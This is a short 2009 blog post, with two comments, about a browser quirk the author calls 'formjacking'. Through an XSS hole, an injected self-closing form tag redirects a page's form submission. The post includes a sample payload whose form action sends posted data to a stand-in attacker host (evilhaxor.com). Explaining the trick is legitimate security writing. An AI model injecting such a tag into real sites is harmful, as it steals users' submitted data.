Home > IT Security > Formjacking

Formjacking

Just read a cool post over at omg.wtf.bbq about a new attack called “formjacking”. Not sure about the attack name, but this is pretty neat. In FireFox 3 and IE7, self contained XHTML tags provide a way to exploit a XSS vulnerability and alter the action associated with a form tag. I’ve tested this out and it also works with Google Chrome, so the same goes for the other WebKit based browsers like Safari.

The gist is that if you can insert a self contained form tag, the browser will ignore the other form tags. Let’s say that you have the following code:

<form action="good.php" method="post">
<input type="text" name="test" id="test"></input>
<input type="Submit" value="Submit">
</form>

If you can insert a self enclosed form tag:

<form action="http://evilhaxor.com/pwned" method="post" />
<form action="good.php" method="post">
<input type="text" name="test" id="test"></input>
<input type="Submit" value="Submit">
</form>

Notice the forward slash at the end of the tag? The second form tag will be ignored and the post data will be sent to the inserted action.

IT Security , ,

  1. May 17th, 2009 at 16:45 | #1

    cool, except your evil form tag is not really self-enclosed in your code snippet

  2. Eric
    May 20th, 2009 at 11:08 | #2

    Yeah, thanks for pointing that out…fixed.

  1. No trackbacks yet.